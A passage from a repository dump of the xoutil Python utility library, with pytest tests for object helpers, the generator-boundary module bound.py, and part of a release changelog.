get_first_of((somedict, inst), \"eggs\") == \"spam\"\n assert get_first_of((somedict, inst), \"foo\") == \"bar\"\n assert get_first_of((inst, somedict), \"foo\") == \"bar2\"\n assert get_first_of((inst, somedict), \"foobar\") is None\n\n none = object()\n assert get_first_of((inst, somedict), \"foobar\", default=none) is none\n _eggs = get_first_of(somedict, \"foo\", \"spam\", pred=lambda v: len(v) > 3)\n assert _eggs == \"eggs\"\n _none = get_first_of(somedict, \"foo\", \"spam\", pred=lambda v: len(v) > 4)\n assert _none is None\n\n with pytest.raises(TypeError):\n get_first_of(None, anything=1)\n\n\ndef test_smart_getter():\n from xoutil.objects import smart_getter\n\n class new:\n pass\n\n o = new()\n o.attr1 = 1\n o.attr2 = 1\n getter = smart_getter(o)\n assert getter(\"attr1\") == getter(\"attr2\") == 1\n assert getter(\"attr3\") is None\n\n getter = smart_getter(o, strict=True)\n assert getter(\"attr1\") == getter(\"attr2\") == 1\n with pytest.raises(AttributeError):\n assert getter(\"attr3\") is None\n\n d = {\"key1\": 1, \"key2\": 1}\n getter = smart_getter(d)\n assert getter(\"key1\") == getter(\"key2\") == 1\n assert getter(\"key3\") is None\n\n getter = smart_getter(d, strict=True)\n assert getter(\"key1\") == getter(\"key2\") == 1\n with pytest.raises(KeyError):\n assert getter(\"key3\") is None\n assert getter(\"key3\", None) is None\n\n\ndef test_smart_setter():\n from xoutil.objects import smart_setter\n\n class new:\n pass\n\n o = new()\n setter = smart_setter(o)\n setter(\"attr1\", 1)\n setter(\"attr2\", 1)\n assert o.attr1 == o.attr2 == 1\n\n d = {\"key1\": 1, \"key2\": 1}\n setter = smart_setter(d)\n setter(\"key1\", 10)\n assert d[\"key1\"] == 10\n\n\ndef test_extract_attrs():\n from xoutil.objects import extract_attrs\n\n d = dict(a=(1,), b=2, c=3, x=4)\n assert extract_attrs(d, \"a\") == (1,)\n assert extract_attrs(d, \"a\", \"b\", \"c\", \"x\") == ((1,), 2, 3, 4)\n\n with pytest.raises(AttributeError):\n assert extract_attrs(d, \"y\")\n assert extract_attrs(d, \"y\", default=None) is None\n\n class new:\n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n d = new(a=(1,), b=2, c=3, x=4)\n assert extract_attrs(d, \"a\") == (1,)\n assert extract_attrs(d, \"a\", \"b\", \"c\", \"x\") == ((1,), 2, 3, 4)\n\n with pytest.raises(AttributeError):\n assert extract_attrs(d, \"y\")\n assert extract_attrs(d, \"y\", default=None) is None\n\n\ndef test_copy_class():\n from xoutil.symbols import Unset\n from xoutil.objects import copy_class\n\n u = str\n\n class MetaFoo(type):\n pass\n\n class Foo(metaclass=MetaFoo):\n a = 1\n b = 2\n c = 3\n d = 4\n\n class Baz(Foo):\n e = 5\n\n index = {k: getattr(Foo, k) for k in \"abcd\"}\n Bar = copy_class(Foo)\n assert Bar.a == Foo.a and Bar.b and Bar.c and Bar.d\n\n Egg = copy_class(Foo, ignores=[\"b\", \"c\"])\n assert getattr(Egg, \"b\", Unset) is Unset\n\n Egg = copy_class(Foo, ignores=[lambda k: index.get(k) and index.get(k) > 2])\n assert Egg.a == Foo.a\n assert getattr(Egg, \"c\", Unset) is Unset\n\n Named = copy_class(Foo, new_name=\"Named\")\n assert Named.__name__ == \"Named\"\n\n Named = copy_class(Foo, new_name=u(\"Named\"))\n assert Named.__name__ == \"Named\"\n\n import fnmatch\n\n pattern = lambda attr: fnmatch.fnmatch(attr, \"a*\")\n Egg = copy_class(Foo, ignores=[pattern])\n assert getattr(Egg, \"a\", Unset) is Unset\n\n import re\n\n _pattern = re.compile(\"^a\")\n pattern = lambda attr: _pattern.match(attr)\n Egg = copy_class(Foo, ignores=[pattern])\n assert getattr(Egg, \"a\", Unset) is Unset\n\n\ndef test_validate_attrs():\n from xoutil.objects import validate_attrs\n\n class Person:\n def __init__(self, **kwargs):\n for which in kwargs:\n setattr(self, which, kwargs[which])\n\n source = Person(name=\"Manuel\", age=33, sex=\"male\")\n target = {\"name\": \"Manuel\", \"age\": 4, \"sex\": \"male\"}\n\n assert validate_attrs(\n source, target, force_equals=(\"sex\",), force_differents=(\"age\",)\n )\n\n assert not validate_attrs(source, target, force_equals=(\"age\",))\n\n\[email protected]()\ndef test_memoized_classproperty():\n from xoutil.objects import memoized_property\n from xoutil.objects import classproperty\n\n current = 1\n\n class Foobar:\n @memoized_property\n @classproperty\n def prop(cls):\n return current\n\n @classproperty\n @memoized_property\n def prop2(cls):\n return current\n\n assert Foobar.prop == current\n current += 1\n assert Foobar.prop != current\n\n\ndef test_properties():\n from xoutil.objects import xproperty, classproperty, staticproperty\n\n _x = \"static\"\n\n class Foobar:\n _x = \"class\"\n\n def __init__(self):\n self._x = \"instance\"\n\n @xproperty\n def x(self):\n return self._x\n\n @classproperty\n def cprop(cls):\n return cls._x\n\n @staticproperty\n def sprop():\n return _x\n\n f = Foobar()\n\n assert Foobar.x == \"class\"\n assert f.x == \"instance\"\n\n assert Foobar.cprop == \"class\"\n assert f.cprop == \"class\"\n\n assert Foobar.sprop == \"static\"\n assert f.sprop == \"static\"\n\n\ndef test_multi_getter_failure():\n \"\"\"`multi_getter` is not the same as `traverse`.\n\n When a collection of identifiers is given, it get the first valid value\n (see the documentation).\n\n \"\"\"\n from xoutil.objects import multi_getter\n from xoutil.objects import traverse\n\n class new:\n def __init__(self, **k):\n self.__dict__.update(k)\n\n top = new(d=dict(a=1, b=2), a=10, b=20)\n\n assert traverse(top, \"d.a\") == 1\n assert next(multi_getter(top, (\"d\", \"a\"))) == {\"a\": 1, \"b\": 2}\n\n\ndef test_save_attributes():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import save_attributes\n\n obj = new(a=1, b=2)\n with save_attributes(obj, \"a\"):\n obj.a = 2\n obj.b = 3\n assert obj.a == 2\n\n assert obj.a == 1\n assert obj.b == 3\n\n\ndef test_temp_attributes():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import temp_attributes\n\n obj = new(a=1, b=2)\n with temp_attributes(obj, dict(a=2)):\n assert obj.a == 2\n assert obj.b == 2\n obj.b = 3\n\n assert obj.a == 1\n assert obj.b == 3\n\n\ndef test_save_raises_errors():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import save_attributes\n\n getter = lambda o: lambda a: getattr(o, a)\n obj = new(a=1, b=2)\n with pytest.raises(AttributeError):\n with save_attributes(obj, \"c\", getter=getter):\n pass\n\n with save_attributes(obj, \"x\"):\n pass\n\n assert obj.x is None\n\n obj = object()\n with pytest.raises(AttributeError):\n with save_attributes(obj, \"x\"):\n pass\n\n\ndef test_import_object():\n from xoutil.objects import import_object\n\n assert import_object(\"xoutil.objects.import_object\") is import_object\n assert import_object(\"xoutil.objects:import_object\") is import_object\n\n\ndef test_delegator():\n from xoutil.objects import delegator\n\n class Bar:\n x = object()\n\n class Foo(delegator(\"egg\", {\"x1\": \"x\", \"x2\": \"spam\"})):\n def __init__(self):\n self.egg = Bar()\n\n foo = Foo()\n assert foo.x1 is foo.egg.x\n\n with pytest.raises(AttributeError):\n foo.x2\n\n\ndef test_final_subclasses():\n from xoutil.objects import get_final_subclasses\n\n class Base:\n pass\n\n class Subclass(Base):\n pass\n\n class Final(Subclass):\n pass\n\n class SubSub(Subclass):\n pass\n\n class Final2(SubSub):\n pass\n\n assert set(get_final_subclasses(Base)) == {Final, Final2}\n assert set(get_final_subclasses(Final, include_this=False)) == set([])\n\n\ndef test_FinalSubclassEnumeration():\n from xoutil.objects import FinalSubclassEnumeration\n\n class Base:\n pass\n\n enum = FinalSubclassEnumeration(Base)\n enum2 = FinalSubclassEnumeration(Base, dynamic=False)\n\n assert not enum.__members__\n assert not enum2.__members__\n\n class Subclass(Base):\n pass\n\n class Final(Subclass):\n pass\n\n assert enum.Final is Final\n assert not enum2.__members__\n\n enum2.invalidate_cache()\n assert enum2.Final is Final\n" }, { "alpha_fraction": 0.6636363863945007, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 35.66666793823242, "blob_id": "09b0dcd800c8501f3177b3f5c5512cf3f2005aa5", "content_id": "fb29fba86e53582c4d0ebd725739cc00bda38d20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 771, "license_type": "no_license", "max_line_length": 78, "num_lines": 21, "path": "/xotl/tools/future/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extend standard modules including \"future\" features in current versions.\n\nVersion 3 introduce several concepts in standard modules. Sometimes these\nfeatures are implemented in the evolution of 2.7.x versions. By using\nsub-modules, these differences can be avoided transparently. For example, you\ncan import `xotl.tools.future.collections.UserDict`:class: in any version,\nthat it's equivalent to Python 3 `collections.UserDict`:class:, but it don't\nexists in Python 2.\n\n.. versionadded:: 1.7.2\n\n\"\"\"\n" }, { "alpha_fraction": 0.6783154010772705, "alphanum_fraction": 0.6792114973068237, "avg_line_length": 31.823530197143555, "blob_id": "ef204ea6321879ded4f83f0966081d6e6dd2a2e6", "content_id": "dc4ce7ab41aedb6eecfc042a91b6c3df6b873279", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 73, "num_lines": 34, "path": "/xotl/tools/dim/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Facilities to work with `concrete numbers`_.\n\nThe name `dim`:mod: is a short of dimension. We borrow it from the topic\n\"dimensional analysis\", even though the scope of this module is less\nambitious.\n\nThis module is divided in two major parts:\n\n- `xotl.tools.dim.meta`:mod: which allows to define almost any kind of\n quantity decorated with a unit.\n\n- Other modules ``xotl.tools.dim.*`` which contains applications of the\n definitions in `~xotl.tools.dim.meta`:mod:. In particular,\n `xotl.tools.dim.base`:mod: contains the `base quantities`_ for the\n `International System of Quantities`_.\n\n\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n\n.. _base quantities: https://en.wikipedia.org/wiki/Base_quantity\n\n.. _International System of Quantities: \\\n https://en.wikipedia.org/wiki/International_System_of_Quantities\n\n\"\"\"\n" }, { "alpha_fraction": 0.6094034910202026, "alphanum_fraction": 0.6121637225151062, "avg_line_length": 32.34633255004883, "blob_id": "bde46453768d7da0ef0a88dda2baf597ca5be6f2", "content_id": "b780f42dd7a5e8246d9e69dfd526ba329bab9f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21376, "license_type": "no_license", "max_line_length": 88, "num_lines": 641, "path": "/xotl/tools/bound.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Helpers for bounded execution of co-routines.\n\nExample::\n\n >>> def fibonacci():\n ... a, b = 1, 1\n ... while True:\n ... yield a\n ... a, b = b, a + b\n\nThis function yields forever. This module allows to get instances of that\nfunction that run until a boundary condition is met. For instance, the\n`times`:func: boundary stops after a given numbers of results are generated::\n\n >>> fib8 = times(8)(fibonacci)\n >>> fib8() # the 8th fibonacci number is\n 21\n\nThis is repeatable::\n\n >>> fib8() # the 8th fibonacci number is\n 21\n\n >>> fib8() # the 8th fibonacci number is\n 21\n\nUnless you pass in a generator::\n\n >>> fib8 = times(8)(fibonacci())\n >>> fib8()\n 21\n\n >>> fib8() is None\n True\n\n\"\"\"\n\nfrom types import GeneratorType\nfrom xotl.tools.decorator.meta import decorator\n\n\nclass BoundedType(type):\n \"\"\"A bounded generator/function.\"\"\"\n\n pass\n\n\nclass Bounded(metaclass=BoundedType):\n \"\"\"The bounded function.\n\n This is the result of applying a `boundary definition` to an `unbounded\n function` (or generator).\n\n If `target` is a function this instance can be called several times. If\n it's a generator then it will be closed after either calling\n (``__call__``) this instance, or consuming the generator given by\n `generate`:meth:.\n\n \"\"\"\n\n def __init__(self, target):\n self.target = target\n\n # The following two methods are actually implemented as closures in the\n # apply method of BoundaryCondition. Nevertheless, they are documented\n # here as an API promise.\n def __call__(self, *args, **kwargs):\n \"\"\"Return the last value from the underlying `bounded generator`.\n\n \"\"\"\n raise NotImplementedError()\n\n def generate(self, *args, **kwargs):\n \"\"\"Return the `bounded generator`.\n\n This method exposes the `bounded generator`. This allows you to \"see\"\n all the values yielded by the `unbounded generator` up to the point\n when the boundary condition is met.\n\n \"\"\"\n raise NotImplementedError()\n\n\nclass BoundaryCondition:\n \"\"\"Embodies the boundary protocol.\n\n The `definition` argument must a function that implements a `boundary\n definition`. This function may take arguments to initialize the state of\n the boundary condition.\n\n Instances are callables that will return a `Bounded`:class: subclass\n specialized with the application of the `boundary condition` to a given\n unbounded function (`target`). For instance, ``times(6)`` returns a\n class, that when instantiated with a `target` represents the bounded\n function that takes the 6th valued yielded by target.\n\n If the `definition` takes no arguments for initialization you may pass the\n `target` directly. This is means that if `__call__`:func: receives\n arguments they will be used to instantiate the `Bounded`:class: subclass,\n ie. this case allows only a single argument `target`.\n\n If `errors` is not None it should be a tuple of exceptions to catch and\n throw inside the boundary condition definition. Other exceptions, beside\n GeneratorExit and StopIteration, are not handled (so the bubble up). See\n `until_error`:func:.\n\n \"\"\"\n\n def __new__(cls, definition, name=None, errors=None):\n from types import FunctionType\n\n if not isinstance(definition, FunctionType):\n raise TypeError('\"definition\" must be a function')\n if not name:\n from xotl.tools.names import nameof\n\n name = nameof(definition, inner=True, full=True)\n result = super().__new__(cls)\n result.name = name # needs to be set here or it'll be None\n return result\n\n def __init__(self, definition, name=None, errors=None):\n from inspect import getargspec\n\n spec = getargspec(definition)\n self.args = spec[0]\n self.defaults = spec[3]\n self.varargs = spec[1]\n self.varkwargs = spec[2]\n self.definition = definition\n if not errors:\n errors = (Exception,)\n self.errors = errors\n\n def __str__(self):\n return str(\"boundary %s(...)\" % self.name)\n\n def __repr__(self):\n return str(self)\n\n @property\n def receive_args(self):\n return self.args or self.defaults or self.varargs or self.varkwargs\n\n def apply(self, args, kwargs):\n def execute(boundary, unbounded, initial):\n \"\"\"Executes the unbounded generator guarded by a boundary condition.\n\n `boundary` is the boundary condition. `unbounded` is the unbounded\n generator. Both must be generators.\n\n `initial` is the tuple of ``(args, kwargs)`` passed when calling\n the unbounded function or None.\n\n This function is used in the (closure) `generate` method of the\n Bounded subclass returned by `apply`. It contains the core\n algorithm that interleaves the boundary condition with the\n unbounded generator.\n\n \"\"\"\n try:\n next(boundary) # Initialize the boundary condition\n stop = boundary.send(initial)\n except StopIteration:\n raise RuntimeError('Invalid boundary definition \"%r\"' % self.definition)\n try:\n while stop is not True:\n try:\n data = next(unbounded)\n yield data\n except (GeneratorExit, StopIteration):\n stop = True\n except self.errors as error:\n stop = boundary.throw(error)\n else:\n try:\n stop = boundary.send(data)\n except StopIteration:\n raise RuntimeError(\n 'Invalid boundary definition \"%r\"' % self.definition\n )\n finally:\n boundary.close()\n unbounded.close()\n\n class bounded(Bounded):\n @classmethod\n def build_pred(boundedcls):\n return self.build_generator(args, kwargs)\n\n def generate(me, *args, **kwargs):\n target = me.target\n if isinstance(target, GeneratorType):\n return execute(me.build_pred(), target, None)\n else:\n generator = target(*args, **kwargs)\n return execute(me.build_pred(), generator, (args, kwargs))\n\n def __call__(me, *args, **kwargs):\n data = None\n for data in me.generate(*args, **kwargs):\n pass\n return data\n\n return bounded # return from apply()\n\n def build_generator(self, args, kwargs):\n if self.receive_args:\n generator = self.definition(*args, **kwargs)\n else:\n generator = self.definition()\n return generator\n\n def __call__(self, *args, **kwargs):\n if self.receive_args:\n return self.apply(args, kwargs)\n elif args or kwargs:\n result = self.apply((), {})(*args, **kwargs)\n if len(args) == 1:\n from functools import update_wrapper\n\n update_wrapper(result, args[0])\n return result\n else:\n return self.apply((), {})\n\n\n@decorator\ndef boundary(definition, name=None, base=BoundaryCondition, errors=None):\n \"\"\"Helper to define a boundary condition.\n\n The `definition` must be a function that returns a generator. The\n following rules **must be** followed. Collectively these rules are called\n the `boundary protocol`.\n\n - The `boundary definition` will yield True when and only when the\n boundary condition is met. Only the value True will signal the boundary\n condition.\n\n - The `boundary definition` must yield at least 2 times:\n\n - First it will be called its ``next()`` method to allow for\n initialization of internal state.\n\n - Immediately after, it will be called its ``send()`` passing the tuple\n ``(args, kwargs)`` with the arguments passed to the `unbounded\n function`. At this point the boundary definition may yield True to\n halt the execution. In this case, the `unbounded generator` won't be\n asked for any value.\n\n - The `boundary definition` must yield True before terminating with a\n StopIteration. For instance the following definition is invalid cause\n it ends without yielding True::\n\n @boundary\n def invalid():\n yield\n yield False\n\n - The `boundary definition` must deal with GeneratorExit exceptions\n properly since we call the ``close()`` method of the generator upon\n termination. Termination occurs when the `unbounded generator` stops by\n any means, even when the boundary condition yielded True or the\n generator itself is exhausted or there's an error in the generator.\n\n Both `whenall`:func: and `whenany`:func: call the ``close()`` method of\n all their subordinate boundary conditions.\n\n Most of the time this reduces to *not* catching GeneratorExit\n exceptions.\n\n A RuntimeError may happen if any of these rules is not followed by the\n `definition`. Furthermore, this error will occur when invoking the\n `bounded function` and not when applying the boundary to the `unbounded\n generator`.\n\n \"\"\"\n from functools import update_wrapper\n\n result = base(definition, name=name, errors=errors)\n return update_wrapper(result, definition)\n\n\n@boundary\ndef timed(maxtime):\n \"\"\"Becomes True after a given amount of time.\n\n The bounded generator will be allowed to yields values until the `maxtime`\n time frame has elapsed.\n\n Usage::\n\n @timed(timedelta(seconds=60))\n def do_something_in_about_60s():\n while True:\n yield\n\n .. note:: This is a very soft limit.\n\n We can't actually guarrant any enforcement of the time limit. If the\n bounded generator takes too much time or never yields this predicated\n can't do much. This usually helps with batch processing that must not\n exceed (by too much) a given amount of time.\n\n The timer starts just after the ``next()`` function has been called for\n the predicate initialization. So if the `maxtime` given is too short this\n predicated might halt the execution of the bounded function without\n allowing any processing at all.\n\n If `maxtime` is not a timedelta, the timedelta will be computed as\n ``timedelta(seconds=maxtime)``.\n\n \"\"\"\n from datetime import datetime, timedelta\n\n if isinstance(maxtime, timedelta):\n bound = maxtime\n else:\n bound = timedelta(seconds=maxtime)\n start = datetime.now()\n yield False # Deal with next-send calling scheme for boundaries\n while datetime.now() - start < bound:\n yield False\n yield True # Or we're not compliant with the boundary protocol.\n\n\n@boundary\ndef times(n):\n \"\"\"Becomes True after a given after the `nth` item have been produced.\"\"\"\n passed = 0\n yield False\n while passed < n:\n yield False\n passed += 1\n yield True\n\n\n@boundary\ndef accumulated(mass, *attrs, **kwargs):\n \"\"\"Becomes True after accumulating a given \"mass\".\n\n `mass` is the maximum allowed to accumulate. This is usually a positive\n number. Each value produced by the `unbounded generator` is added\n together. Yield True when this amount to more than the given `mass`.\n\n If any `attrs` are provided, they will be considered attributes (or keys)\n to search inside the yielded data from the bounded function. If no\n `attrs` are provided the whole data is accumulated, so it must allow\n addition. The attribute to be summed is extracted with\n `~xotl.tools.objects.get_first_of`:func:, so only the first attribute\n found is added.\n\n If the keyword argument `initial` is provided the accumulator is\n initialized with that value. By default this is 0.\n\n \"\"\"\n from xotl.tools.objects import get_first_of\n\n accum = kwargs.pop(\"initial\", 0)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments %r\" % kwargs.keys())\n yield False\n while accum < mass:\n data = yield False\n accum += get_first_of(data, *attrs, default=data)\n yield True\n\n\n@boundary\ndef pred(func, skipargs=True):\n \"\"\"Allow \"normal\" functions to engage within the boundary protocol.\n\n `func` should take a single argument and return True if the boundary\n condition has been met.\n\n If `skipargs` is True then function `func` will not be called with the\n tuple ``(args, kwargs)`` upon initialization of the boundary, in that case\n only yielded values from the `unbounded generator` are passed. If you\n need to get the original arguments, set `skipargs` to False, in this case\n the first time `func` is called will be passed a single argument ``(arg,\n kwargs)``.\n\n Example::\n\n >>> @pred(lambda x: x > 10)\n ... def fibonacci():\n ... a, b = 1, 1\n ... while True:\n ... yield a\n ... a, b = b, a + b\n\n >>> fibonacci()\n 13\n\n \"\"\"\n sentinel = object()\n data = yield False\n if skipargs:\n data = sentinel\n while data is sentinel or not func(data):\n data = yield False\n yield True\n\n\ndef until_errors(*errors, **kwargs):\n \"\"\"Becomes True after any of `errors` has been raised.\n\n Any other exceptions (except GeneratorExit) is propagated. You must pass\n at least an error.\n\n Normally this will allow some possibly long jobs to be interrupted\n (SoftTimeLimitException in celery task, for instance) but leave some time\n for the caller to clean up things.\n\n It's assumed that your job can be properly *finalized* after any of the\n given exceptions has been raised.\n\n :keyword on_error: A callable that will only be called if the boundary\n condition is ever met, i.e if any of `errors` was\n raised. The callback is called before yielding True.\n\n .. versionadded:: 1.7.2\n\n .. versionchanged:: 1.7.5 Added the keyword argument `on_error`.\n\n \"\"\"\n if not errors:\n raise TypeError(\"catch must be called with at least an exception\")\n elif any(not issubclass(e, Exception) for e in errors):\n raise TypeError(\"catch must be called only with subclasses of Exception\")\n if any(issubclass(e, GeneratorExit) for e in errors):\n raise TypeError(\"You cannot catch GeneratorExit\")\n on_error = kwargs.pop(\"on_error\", None)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments: %s\" % \", \".join(kwargs))\n\n @boundary(errors=errors)\n def _catch():\n yield False\n try:\n while True:\n yield False\n except errors:\n if on_error is not None:\n on_error()\n yield True\n\n return _catch()\n\n\ndef until(**kwargs):\n \"\"\"An idiomatic alias to other boundary definitions.\n\n - ``until(maxtime=n)`` is the same as ``timed(n)``.\n\n - ``until(times=n)`` is the same as ``times(n)``.\n\n - ``until(pred=func, skipargs=skip)`` is the same as\n ``pred(func, skipargs=skip)``.\n\n - ``until(errors=errors, **kwargs)`` is the same as\n ``until_errors(*errors, **kwargs)``.\n\n - ``until(accumulate=mass, path=path, initial=initial)`` is the same as\n ``accumulated(mass, *path.split('.'), initial=initial)``\n\n .. warning:: You cannot mix many calls.\n\n .. versionadded:: 1.7.2\n\n \"\"\"\n maxtime = kwargs.pop(\"maxtime\", None)\n if maxtime:\n return timed(maxtime, **kwargs)\n n = kwargs.pop(\"times\", None)\n if n:\n return times(n, **kwargs)\n func = kwargs.pop(\"pred\", None)\n if func:\n return pred(func, **kwargs)\n errors = kwargs.pop(\"errors\", None)\n if errors:\n return until_errors(*errors, **kwargs)\n mass = kwargs.pop(\"accumulate\", None)\n if mass:\n path = kwargs.pop(\"path\", None)\n if path:\n return accumulated(mass, *path.split(\".\"), **kwargs)\n else:\n return accumulated(mass, **kwargs)\n raise TypeError\n\n\nclass HighLevelBoundary(BoundaryCondition):\n \"\"\"Boundary class for high-level boundary conditions.\n\n The `apply` method of this only accepts the `args`, which must be\n BoundaryCondition objects or BoundedType objects (ie. an instance of a\n boundary condition), then it replaces the normal boundary condition for\n that of the high-level given the subordinate definitions.\n\n \"\"\"\n\n def apply(self, boundaries, kwargs):\n assert boundaries and not kwargs\n base = super().apply(boundaries, kwargs)\n\n class rebounded(base):\n @classmethod\n def build_pred(cls):\n from types import FunctionType, GeneratorType\n\n subordinates = []\n for bound in boundaries:\n if isinstance(bound, FunctionType):\n bound = boundary(bound)\n elif isinstance(bound, GeneratorType):\n gen = bound # get a copy for the lambda below\n bound = boundary(lambda: gen)\n if isinstance(bound, BoundaryCondition):\n if bound.receive_args:\n raise TypeError('\"%s\" must be initialized' % bound.name)\n bound = bound.apply((), {})\n if isinstance(bound, BoundedType):\n sub = bound.build_pred()\n else:\n raise TypeError('Invalid argument \"%r\"' % bound)\n subordinates.append(sub)\n return self.definition(*subordinates)\n\n return rebounded\n\n\n@boundary(base=HighLevelBoundary)\ndef whenall(*subordinates):\n \"\"\"An AND-like boundary condition.\n\n It takes several boundaries and returns a single one that behaves like the\n logical AND i.e, will yield True when **all** of its subordinate boundary\n conditions have yielded True.\n\n It ensures that once a subordinate yields True it won't be sent more data,\n no matter if other subordinates keep on running and consuming data.\n\n Calls ``close()`` of all subordinates upon termination.\n\n Each `boundary` should be either:\n\n - A \"bare\" boundary definition that takes no arguments.\n\n - A boundary condition (i.e an instance of `BoundaryCondition`:class:).\n This is result of calling a boundary definition.\n\n - A generator object that complies with the boundary protocol. This\n cannot be tested upfront, a misbehaving generator will cause a\n RuntimeError if a boundary protocol rule is not followed.\n\n Any other type is a TypeError.\n\n \"\"\"\n preds = list(subordinates) # a copy of the list\n for pred in preds:\n next(pred)\n try:\n while preds: # out of preds it means all have yielded True\n data = yield False\n i = 0\n while preds and i < len(preds):\n pred = preds[i]\n try:\n res = pred.send(data)\n except StopIteration:\n raise RuntimeError(\"Invalid predicated in %r\" % preds)\n else:\n if res is True:\n del preds[i] # no more send() for this pred\n else:\n i += 1\n yield True\n except GeneratorExit:\n pass\n for pred in subordinates:\n pred.close()\n\n\n@boundary(base=HighLevelBoundary)\ndef whenany(*preds):\n \"\"\"An OR-like boundary condition.\n\n It takes several boundaries and returns a single one that behaves like the\n logical OR, i.e, will yield True when **any** of its subordinate boundary\n conditions yield True.\n\n Calls ``close()`` of all subordinates upon termination.\n\n Each `boundary` should be either:\n\n - A \"bare\" boundary definition that takes no arguments.\n\n - A boundary condition (i.e an instance of `BoundaryCondition`:class:).\n This is result of calling a boundary definition.\n\n - A generator object that complies with the boundary protocol. This\n cannot be tested upfront, a misbehaving generator will cause a\n RuntimeError if a boundary protocol rule is not followed.\n\n Any other type is a TypeError.\n\n \"\"\"\n for pred in preds:\n next(pred)\n stop = False\n try:\n while stop is not True:\n data = yield stop\n i, top = 0, len(preds)\n while not stop and i < top:\n pred = preds[i]\n try:\n stop = stop or pred.send(data)\n except StopIteration:\n raise RuntimeError(\"Invalid predicated in %r\" % preds)\n else:\n i += 1\n yield stop\n except GeneratorExit:\n pass\n for pred in preds:\n pred.close()\n\n\ndel decorator\n" }, { "alpha_fraction": 0.45768141746520996, "alphanum_fraction": 0.5584860444068909, "avg_line_length": 18.395954132080078, "blob_id": "8416fb1dc15c9032930241fa8700beed226c1415", "content_id": "baf38aa1e04c91e537e2f185b483dd384ab6bb92", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 13422, "license_type": "permissive", "max_line_length": 82, "num_lines": 692, "path": "/docs/source/HISTORY.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Changelog\n=========\n\n2.2 series\n----------\n\nUnrelased. Release 2.2.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.2.0.rst\n\n\n2.1 series\n----------\n\n2020-03-10. Release 2.1.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.7.rst\n\n\n2020-01-21. Release 2.1.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.6.rst\n\n\n2019-12-12. Release 2.1.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.5.rst\n\n\n2019-10-26. Release 2.1.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.4.rst\n\n\n2019-05-26. Release 2.1.3\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.3.rst\n\n\n2019-05-26. Release 2.1.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.2.rst\n\n\n2019-03-13. Release 2.1.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.1.rst\n\n\n2019-02-27. Release 2.1.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.1.0.rst\n\n\n2.0 series\n----------\n\n.. note:: End-of-life for xoutil 2.0\n\n xoutil 2.0.7 will be the last release in the xoutil 2.0.x series that adds\n new functionality. Any future release in this series will be bug-fix only.\n\n Since the pair-wise releases of 1.9.x and 2.0.x some new functionality has\n been added to some version of 1.9.x that is not present in some releases of\n the 2.0.x series.\n\n This created some dose of unease for users wanting a new feature in 1.9.3\n in a package where Python 2/3 was not a true concern; they were forced to\n require 'xoutil>=1.9.3,!=2.0.0,!=2.0.1,!=2.0.2' to avoid the package\n manager to select a version without the needed feature.\n\n This end-of-life notice puts an end to this issue.\n\n\n2018-11-07. Release 2.0.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.9.rst\n\n\n2018-09-24. Release 2.0.8\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.8.rst\n\n\n2018-09-14. Release 2.0.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.7.rst\n\n\n2018-07-30. Release 2.0.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.6.rst\n\n\n2018-06-25. Release 2.0.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.5.rst\n\n\n2018-05-09. Release 2.0.4.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.4.1.rst\n\n\n2018-05-08. Release 2.0.4\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.4.rst\n\n\n2018-04-16. Release 